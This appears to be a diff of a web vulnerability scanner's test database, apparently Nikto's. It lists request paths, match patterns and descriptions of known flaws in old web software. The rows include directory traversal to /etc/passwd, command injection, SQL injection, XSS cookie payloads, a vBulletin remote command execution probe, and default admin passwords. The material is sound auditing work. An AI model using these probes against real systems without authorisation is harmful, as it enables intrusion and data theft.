"001488","2793","7","/.../.../.../.../.../.../.../.../.../.../etc/passwd","GET","root:","","","","","TelCondex SimpleWebserver 2.13.31027 and below allows directory traversal.","","" 1501 "001489","2799","8","@CGIDIRSdose.pl?daily&somefile.txt&|ls|","GET","somefile .txt","","","","","DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.","",""1501 "001489","2799","8","@CGIDIRSdose.pl?daily&somefile.txt&|ls|","GET","somefile\.txt","","","","","DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.","","" 1502 1502 "001490","2813","4","/admin/database/wwForum.mdb","GET","200","","","","","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein","","" 1503 1503 "001491","2830","5","/../config.dat","GET","EnablePasswords","","","","","Directory traversal and config.dat suggests NetServe web server and default admin folder. This file contains the administrative login/pass.","","" … … 1513 1513 "001501","2873","a","@CGIDIRSgbadmin.cgi?action=setup","GET","200","","","","","RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200","","" 1514 1514 "001502","2915","a","@CGIDIRSgbpass.pl","GET","200","","","",""," RNN Guestbook 1.2 password storage file. Administrative password should be stored in plaintext. Access gbadmin.cgi in the same directory to (ab)use. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 2003 BugTraq post by brainrawt@ha","","" 1515 "001503","2921","4","/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>","GET","<script>alert ('test')</script>","","","","","VP-ASP prior to 4.50 are vulnerable to XSS attacks","",""1516 "001504","2921","4","shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","VP-ASP Shopping Cart 4.x shopdisplayproducts.asp XSS.","",""1515 "001503","2921","4","/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>","GET","<script>alert\('test'\)<\/script>","","","","","VP-ASP prior to 4.50 are vulnerable to XSS attacks","","" 1516 "001504","2921","4","shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","VP-ASP Shopping Cart 4.x shopdisplayproducts.asp XSS.","","" 1517 1517 "001505","2922","3","/admin/wg_user-info.ml","GET","200","","","","","WebGate Web Eye exposes user names and passwords.","","" 1518 1518 "001506","2927","4","/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*","GET","Statistics for your banner","","","","","Xoops 1.3.x, 2.0.x thru 2.0.5 are vulnerable to SQL injection in the banners.php file. Upgrade to 2.0.5.1 or higher.","","" … … 1520 1520 "001508","2944","3","/showmail.pl","GET","200","","","","","@Mail WebMail 3.52 allows attacker to read arbitrary user's mailbox. Requires knowing valid user name and appending ?Folder=../../victim@somehost.com/mbox/Inbox to the showmail.pl file.","","" 1521 1521 "001509","2948","9","/reademail.pl","GET","200","","","","","@Mail WebMail 3.52 contains an SQL injection that allows attacker to read any email message for any address registered in the system. Example to append to reademail.pl: ?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1","","" 1522 "001510","2950","4","/showmail.pl?Folder=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","404","","@Mail WebMail 3.52 contains an XSS in the showmail.pl file.","",""1522 "001510","2950","4","/showmail.pl?Folder=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","404","","@Mail WebMail 3.52 contains an XSS in the showmail.pl file.","","" 1523 1523 "001511","3","6","/iissamples/exair/search/query.asp","GET","200","","","","","Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.","","" 1524 1524 "001512","3058","9","/index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]","GET","query error","","mySQL error","","","Invision Power Board 2.0alpha3 and before are vulnerable to an SQL injection attack.","","" … … 1542 1542 "001530","3092","1","/cgi-sys/scgiwrap","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" 1543 1543 "001531","3092","1","/cgi-sys/signup.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","","" 1544 "001532","3268","12","/pdf/","GET"," index of ","","","","","Directory indexing found.","",""1544 "001532","3268","12","/pdf/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1545 1545 "001533","3092","1","/sqlnet.log","GET","200","","","","","Oracle log file found.","","" 1546 1546 "001534","3092","1","@CGIDIRSGW5/GWWEB.EXE","GET","200","","","","","Groupwise web interface","","" … … 1624 1624 "001614","3092","1","/clientes/","GET","200","","","","","This might be interesting...","","" 1625 1625 "001615","3092","1","/clients/","GET","200","","","","","This might be interesting...","","" 1626 "001617","3268","2","/code/","GET"," Index of ","","","","","Directory indexing found.","",""1626 "001617","3268","2","/code/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1627 1627 "001618","3092","1","/communicator/","GET","200","","","","","This might be interesting...","","" 1628 1628 "001619","3092","1","/compra/","GET","200","","","","","This might be interesting...","","" … … 1630 1630 "001621","3092","1","/compressed/","GET","200","","","","","This might be interesting...","","" 1631 1631 "001622","3092","1","/conecta/","GET","200","","","","","This might be interesting...","","" 1632 "001623","3268","2","/config/","GET"," Index of ","","","","","Directory indexing found.","",""1632 "001623","3268","2","/config/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1633 1633 "001624","3092","1","/config/checks.txt","GET","200","","","","","This might be interesting...","","" 1634 1634 "001625","3092","1","/connect/","GET","200","","","","","This might be interesting...","","" 1635 1635 "001626","3092","1","/console","GET","200","","","","","This might be interesting...","","" 1636 1636 "001627","3092","1","/correo/","GET","200","","","","","This might be interesting...","","" 1637 "001628","3268","2","/counter/","GET"," Index of ","","","","","Directory indexing found.","",""1638 "001629","3268","2","/credit/","GET"," Index of ","","","","","Directory indexing found.","",""1637 "001628","3268","2","/counter/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1638 "001629","3268","2","/credit/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1639 1639 "001630","3092","1","/crypto/","GET","200","","","","","This might be interesting...","","" 1640 1640 "001631","3092","1","/css","GET","200","","","","","This might be interesting...","","" 1641 1641 "001632","3092","1","/cuenta/","GET","200","","","","","This might be interesting...","","" 1642 1642 "001633","3092","1","/cuentas/","GET","200","","","","","This might be interesting...","","" 1643 "001634","3268","2","/customers/","GET"," Index of ","","","","","Directory indexing found.","",""1643 "001634","3268","2","/customers/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1644 1644 "001635","3092","1","/dan_o.dat","GET","200","","","","","This might be interesting...","","" 1645 1645 "001636","3092","1","/dat/","GET","200","","","","","This might be interesting...","","" … … 1720 1720 "001712","3092","1","/invitado/","GET","200","","","","","This might be interesting...","","" 1721 1721 "001713","3092","1","/invitados/","GET","200","","","","","This might be interesting...","","" 1722 "001714","3268","2","/java-plugin/","GET"," index of ","","","","","Directory indexing found.","",""1722 "001714","3268","2","/java-plugin/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1723 1723 "001715","3092","1","/java/","GET","200","","","","","This might be interesting...","","" 1724 1724 "001716","3092","1","/jdbc/","GET","200","","","","","This might be interesting...","","" … … 1793 1793 "001786","3092","1","/passwdfile","GET","200","","","","","This might be interesting...","","" 1794 1794 "001787","3092","1","/password","GET","200","","","","","This could be interesting...","","" 1795 "001788","3268","2","/password/","GET"," index of ","","","","","Directory indexing found.","",""1795 "001788","3268","2","/password/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1796 1796 "001789","3092","1","/passwords.txt","GET","200","","","","","This could be interesting...","","" 1797 1797 "001790","3092","1","/passwords/","GET","200","","","","","This might be interesting...","","" … … 1834 1834 "001828","3092","1","/retail/","GET","200","","","","","This might be interesting...","","" 1835 1835 "001829","3092","1","/reviews/newpro.cgi","GET","200","","","","","This might be interesting...","","" 1836 "001830","3268","2","/root/","GET"," Index of ","","","","","Directory indexing found.","",""1836 "001830","3268","2","/root/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1837 1837 "001831","3092","1","/sales/","GET","200","","","","","This might be interesting...","","" 1838 1838 "001832","3092","1","/sample/","GET","200","","","","","This might be interesting...","","" … … 1845 1845 "001839","3092","1","/search97.vts","GET","200","","","","","This might be interesting...","","" 1846 1846 "001840","3092","1","/secret/","GET","200","","","","","This might be interesting...","","" 1847 "001841","3268","2","/secure/","GET"," Index of ","","","","","Directory indexing found.","",""1848 "001842","3268","2","/secured/","GET"," Index of ","","","","","Directory indexing found.","",""1847 "001841","3268","2","/secure/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1848 "001842","3268","2","/secured/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1849 1849 "001843","3092","1","/sell/","GET","200","","","","","This might be interesting...","","" 1850 "001844","3268","2","/server_stats/","GET"," Index of ","","","","","Directory indexing found.","",""1850 "001844","3268","2","/server_stats/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1851 1851 "001845","3092","1","/service/","GET","200","","","","","This might be interesting...","","" 1852 "001846","3268","2","/services/","GET"," index of ","","","","","Directory indexing found.","",""1852 "001846","3268","2","/services/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1853 1853 "001847","3092","1","/servicio/","GET","200","","","","","This might be interesting...","","" 1854 1854 "001848","3092","1","/servicios/","GET","200","","","","","This might be interesting...","","" … … 1856 1856 "001850","3092","1","/shop/","GET","200","","","","","This might be interesting...","","" 1857 1857 "001851","3092","1","/shopper/","GET","200","","","","","This might be interesting...","","" 1858 "001852","3268","2","/software/","GET"," Index of ","","","","","Directory indexing found.","",""1858 "001852","3268","2","/software/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1859 1859 "001853","3092","1","/solaris/","GET","200","","","","","This might be interesting...","","" 1860 "001854","3268","2","/source/","GET"," Index of ","","","","","Directory indexing found.","",""1860 "001854","3268","2","/source/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1861 1861 "001855","3092","1","/Sources/","GET","200","","","","","This might be interesting... may be YaBB.","","" 1862 1862 "001856","3092","1","/spwd","GET","200","","","","","This might be interesting...","","" 1863 "001857","3268","2","/sql/","GET"," Index of ","","","","","Directory indexing found.","",""1864 "001858","3268","2","/src/","GET"," Index of ","","","","","Directory indexing found.","",""1863 "001857","3268","2","/sql/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1864 "001858","3268","2","/src/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1865 1865 "001859","3092","1","/srchadm","GET","200","","","","","This might be interesting...","","" 1866 1866 "001860","3092","1","/ss.cfg","GET","200","","","","","This might be interesting...","","" 1867 "001861","3268","2","/ssi/","GET"," Index of ","","","","","Directory indexing found.","",""1867 "001861","3268","2","/ssi/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1868 1868 "001862","3092","1","/staff/","GET","200","","","","","This might be interesting...","","" 1869 1869 "001863","3092","1","/stat.htm","GET","200","","","","","This might be interesting...","","" … … 1954 1954 "001948","3092","1","/wwwthreads/w3tvars.pm","GET","200","","","","","This might be interesting...","","" 1955 1955 "001949","3092","1","/zipfiles/","GET","200","","","","","This might be interesting...","","" 1956 "001950","3268","2","/_pages","GET"," index of ","","","","","Directory indexing found.","",""1956 "001950","3268","2","/_pages","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1957 1957 "001951","3092","1","@CGIDIRS","GET","200","","","","","This might be interesting... possibly a system shell found.","","" 1958 1958 "001952","3092","1","@CGIDIRS.fhp","GET","200","","","","","This might be interesting...","","" … … 2499 2499 "002493","3093","1","/includes/footer.php3","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","","" 2500 2500 "002494","3093","1","/includes/header.php3","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","","" 2501 "002500","3093","1","/index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;%20","GET","alert\ (document.cookie\)","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""2501 "002500","3093","1","/index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;%20","GET","alert\\\(document\.cookie\\\)","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","","" 2502 2502 "002501","3093","1","/infos/contact/index.asp","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","","" 2503 2503 "002502","3093","1","/infos/faq/index.asp","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","","" … … 2758 2758 "002758","3093","3","/.ssh/authorized_keys","GET","200","","","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" 2759 2759 "002759","3093","3","/.ssh/known_hosts","GET","200","","","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" 2760 "002760","31","3","@CGIDIRSls","GET"," neither ' /","","","","","The CERN server lets attackers view the host's path. Should be upgraded to Apache, as CERN is not maintained.","",""2760 "002760","31","3","@CGIDIRSls","GET"," neither '\/","","","","","The CERN server lets attackers view the host's path. Should be upgraded to Apache, as CERN is not maintained.","","" 2761 2761 "002761","3133","7","////../../data/config/microsrv.cfg","GET","HostName","","","","","Xerox WorkCentre allows any file to be retrieved remotely.","","" 2762 2762 "002762","3133","7","////////../../../../../../etc/passwd","GET","root:","","","","","Xerox WorkCentre allows any file to be retrieved remotely.","","" … … 2980 2980 "002980","3233","2","/iissamples/sdk/asp/docs/codebrws.asp","GET","200","","","","","This is a default IIS script/file that should be removed. CVE-1999-0739. MS99-013.","","" 2981 2981 "002981","3233","2","/iissamples/sdk/asp/docs/Winmsdp.exe","GET","200","","","","","This is a default IIS script/file that should be removed. CVE-1999-0738. MS99-013.","","" 2982 "002982","3233","2","/mc-icons/","GET"," index of ","","","","","Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.","",""2983 "002983","3233","2","/ns-icons/","GET"," index of ","","","","","Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.","",""2982 "002982","3233","2","/mc-icons/","GET","[Ii]ndex [Oo]f ","","","","","Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.","","" 2983 "002983","3233","2","/ns-icons/","GET","[Ii]ndex [Oo]f ","","","","","Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.","","" 2984 2984 "002984","3233","3","@CGIDIRSprintenv","GET","DOCUMENT_ROOT","","","","","Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. BID-4431.","","" 2985 "002985","3233","3","@CGIDIRSprintenv","GET","Premature end of script headers: /","","","","","Apache 2.0 printenv default script does not have execute permissions but leaks file system paths. It may also allow XSS types of attacks. BID-4431.","",""2985 "002985","3233","3","@CGIDIRSprintenv","GET","Premature end of script headers: \/","","","","","Apache 2.0 printenv default script does not have execute permissions but leaks file system paths. It may also allow XSS types of attacks. BID-4431.","","" 2986 2986 "002986","3233","3","/cgi-bin/test-cgi","GET","PATH_TRANSLATED","","","","","Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.","","" 2987 "002987","3233","3","/cgi-bin/test-cgi","GET","Premature end of script headers: /","","","","","Apache 2.0 printenv default script does not have execute permissions but leaks file system paths.","",""2987 "002987","3233","3","/cgi-bin/test-cgi","GET","Premature end of script headers: \/","","","","","Apache 2.0 printenv default script does not have execute permissions but leaks file system paths.","","" 2988 2988 "002988","3233","3","/pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E","GET","Edit Database","","","","","Oracle admin page may reveal passwords in a prebuilt form and reveal database information.","","" 2989 2989 "002989","3233","3","/test.php","GET","PHP Version","","","","","PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.","","" … … 3000 3000 "003000","3268","2","/icons/","GET","200","","","","","Directory indexing found.","","" 3001 3001 "003001","3268","2","/manual/images/","GET","200","","","","","Directory indexing found.","","" 3002 "003002","3268","2","/com/","GET"," index of ","","","","","Directory indexing found.","",""3003 "003003","3268","2","/COM/","GET"," index of ","","","","","Directory indexing found.","",""3004 "003004","3268","2","/doc/packages/","GET"," index of ","","","","","Directory indexing found.","",""3005 "003005","3268","2","/image/","GET"," Index of ","","","","","Directory indexing found.","",""3006 "003006","3268","2","/javax/","GET"," index of ","","","","","Directory indexing found.","",""3007 "003007","3268","2","/perl/","GET"," Index of ","","","","","Directory indexing found.","",""3008 "003008","3268","2","/scripts/","GET"," Index of ","","","","","Directory indexing found.","",""3009 "003009","3268","2","/SUNWmc/htdocs/en_US/","GET"," index of ","","","","","Directory found. This is likely a Sun Solstice installation.","",""3010 "003010","3268","2","/search/inc/","GET"," index of ","","","","","Directory indexing found. This is likely Sun One Webserver 6.1 search.","",""3011 "003011","3268","2","/images/","GET"," Index of ","","","","","Directory indexing found.","",""3002 "003002","3268","2","/com/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3003 "003003","3268","2","/COM/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3004 "003004","3268","2","/doc/packages/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3005 "003005","3268","2","/image/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3006 "003006","3268","2","/javax/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3007 "003007","3268","2","/perl/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3008 "003008","3268","2","/scripts/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3009 "003009","3268","2","/SUNWmc/htdocs/en_US/","GET","[Ii]ndex [Oo]f ","","","","","Directory found. This is likely a Sun Solstice installation.","","" 3010 "003010","3268","2","/search/inc/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. This is likely Sun One Webserver 6.1 search.","","" 3011 "003011","3268","2","/images/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3012 3012 "003012","3268","3","/docs/","GET","200","","","","","Directory indexing found.","","" 3013 "003013","3268","3","/examples/","GET","Directory Listing"," index of ","","","","Directory indexing found.","",""3014 "003014","3268","3","/style/","GET"," Index of ","","","","","Directory indexing found.","",""3015 "003015","3268","3","/styles/","GET"," Index of ","","","","","Directory indexing found.","",""3016 "003016","3280","3","/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert (document.cookie)</script>","","","","","Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3017 "003017","3281","4","/search.asp?Search=\"><script>alert(Vulnerable)</script>","GET","> <script>alert()</script>","","","","","Max Web Portal is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3013 "003013","3268","3","/examples/","GET","Directory Listing","[Ii]ndex [Oo]f ","","","","Directory indexing found.","","" 3014 "003014","3268","3","/style/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3015 "003015","3268","3","/styles/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3016 "003016","3280","3","/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)<\/script>","","","","","Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3017 "003017","3281","4","/search.asp?Search=\"><script>alert(Vulnerable)</script>","GET",">\<script\>alert\(\)\<\/script\>","","","","","Max Web Portal is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3018 3018 "003018","3282","8","/uploader.php","GET","200","","","","","This script may allow arbitrary files to be uploaded to the remote server.","","" 3019 3019 "003019","3284","3","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","Winmsdp.exe can be used to determine if a file system path exists or not. CVE-1999-0738. MS99-013.","","" … … 3021 3021 "003021","3284","5","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example Winmsdp.exe file. Remove all default files from the web root. CVE-1999-0738. MS99-013.","","" 3022 3022 "003022","3284","6","/iissamples/exair/howitworks/Winmsdp.exe","GET","ASP Source code browser","","","","","This is a default IIS script/file that should be removed. It may allow a DoS against the server. CVE-1999-1451, XF-2371, MS99-013 and MSKB-Q231368","","" 3023 "003023","3285","7","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET"," [fonts]","","","","","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.","",""3024 "003024","3285","7","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET"," [windows]","","","","","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.","",""3023 "003023","3285","7","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","\[fonts\]","","","","","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.","","" 3024 "003024","3285","7","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","\[windows\]","","","","","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.","","" 3025 3025 "003025","3286","5","/conspass.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","","" 3026 3026 "003026","3286","5","/consport.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","","" 3027 3027 "003027","3286","5","/general.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","","" 3028 3028 "003028","3286","5","/srvstatus.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","","" 3029 "003029","3288","3","///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////","GET"," index of ","","","","","Abyss 1.03 reveals directory listing when /'s are requested.","",""3030 "003030","3289","4","/firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz","GET","<script>alert ('Vulnerable')</script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""3031 "003031","3294","4","/firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""3032 "003032","3295","4","/antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0","GET","<script>alert ('Vulnerable')</script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""3033 "003033","3295","4","/antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)","GET","<script>alert ('Vulnerable')</script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""3034 "003034","3296","4","/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session","GET","><script>alert ('Vulnerable')</script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""3035 "003035","3296","4","/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session","GET","<script>alert ('Vulnerable')</script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""3036 "003036","3296","4","/theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session","GET","<script>alert ('Vulnerable')</script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""3037 "003037","3296","4","/theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session","GET","<script>alert ('Vulnerable')</script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""3038 "003038","3297","4","/search.asp?Search=","GET","> <script>alert(Vulnerable)</script>","","","","","Snitz 3.4.0.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3029 "003029","3288","3","///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////","GET","[Ii]ndex [Oo]f ","","","","","Abyss 1.03 reveals directory listing when /'s are requested.","","" 3030 "003030","3289","4","/firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" 3031 "003031","3294","4","/firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" 3032 "003032","3295","4","/antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" 3033 "003033","3295","4","/antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" 3034 "003034","3296","4","/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session","GET","><script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" 3035 "003035","3296","4","/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" 3036 "003036","3296","4","/theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" 3037 "003037","3296","4","/theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","","" 3038 "003038","3297","4","/search.asp?Search=","GET",">\<script\>alert\(Vulnerable\)\<\/script\>","","","","","Snitz 3.4.0.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3039 3039 "003039","3299","8","/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","","" 3040 3040 "003040","3299","8","/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","","" … … 3043 3043 "003043","3299","8","/vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","","" 3044 3044 "003044","3299","8","@CGIDIRScalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","","" 3045 "003045","3300","6","/_vti_bin/","GET","shtml .dll","shtml.exe","","","","shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).","",""3045 "003045","3300","6","/_vti_bin/","GET","shtml\.dll","shtml\.exe","","","","shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).","","" 3046 3046 "003047","3323","6d","/NULL.printer","GET","Error in web printer install","","","","","Internet Printing (IPP) is enabled. Some versions have a buffer overflow/DoS in Windows 2000 that allows remote attackers to gain admin privileges via a long print request that is passed to the extension through IIS 5.0. Disabling the .printer mapping i","","" 3047 3047 "003048","3337","3","/nul..cfm","GET","The template specification","","","","","ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. Macromedia MPSB02-01. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906","","" … … 3077 3077 "003079","3416","7","@CGIDIRSGW5/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","","" 3078 3078 